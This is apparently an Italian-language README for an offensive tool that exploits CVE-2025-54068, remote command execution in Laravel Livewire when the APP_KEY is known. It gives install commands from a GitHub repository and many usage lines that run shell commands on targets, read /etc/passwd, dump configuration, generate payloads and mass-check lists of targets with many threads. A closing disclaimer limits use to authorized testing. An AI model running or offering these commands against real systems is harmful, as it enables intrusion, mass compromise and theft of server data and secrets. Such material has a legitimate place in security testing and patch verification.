
Uno strumento progettato per sfruttare CVE-2025-54068 e l'Esecuzione Remota di Comandi del progetto Livewire.
Uno strumento progettato per sfruttare CVE-2025-54068 e l'Esecuzione di Comandi a Distanza se l'APP_KEY del progetto Livewire è nota.
Questo strumento è una versione ricodificata del progetto originale di Synacktiv:
Il concetto di base e la metodologia si basano sull'implementazione originale. Questa versione include miglioramenti minori e funzionalità aggiuntive per migliorare l'usabilità e la flessibilità.
Installa lo strumento usando pipx:
pipx install git+https://github.com/haxorstars/CVE-2025-54068
oppure usando uv:
uv tool install git+https://github.com/haxorstars/CVE-2025-54068
Esegui lo strumento contro un singolo target:
livewire-rce-2025 -u target.com
Con parametri personalizzati:
livewire-rce-2025 -u https://target.com -p "id;uname -a;pwd;ls -la"
Esegui funzioni personalizzate predefinite:
livewire-rce-2025 -u target.com --custom-function "shell:ls -la"
livewire-rce-2025 -u target.com --custom-function "read:/etc/passwd"
livewire-rce-2025 -u target.com --custom-function "phpinfo"
livewire-rce-2025 -u target.com --custom-function "config"
Combina più funzioni in un unico comando:
livewire-rce-2025 -u target.com --custom-function "shell:whoami && shell:id && read:/etc/passwd"
Usa il tuo file PHP di payload:
livewire-rce-2025 -u target.com --custom-file custom.php --param "shell:id"
Genera payload senza inviarlo al target:
livewire-rce-2025 -generate-payload --custom-function "shell:ls -la"
Oppure usando un file PHP personalizzato:
livewire-rce-2025 -generate-payload --custom-file custom.php
Scansiona più target da un file:
livewire-rce-2025 -mass-check targets.txt -o results.json
Con numero di thread personalizzato:
livewire-rce-2025 -mass-check targets.txt -t 20 -o results.json
Questo strumento è destinato esclusivamente a scopi di test di sicurezza autorizzati e educativi. Non utilizzarlo contro sistemi di cui non possiedi o per i quali non hai esplicita autorizzazione.
Happy hacking😄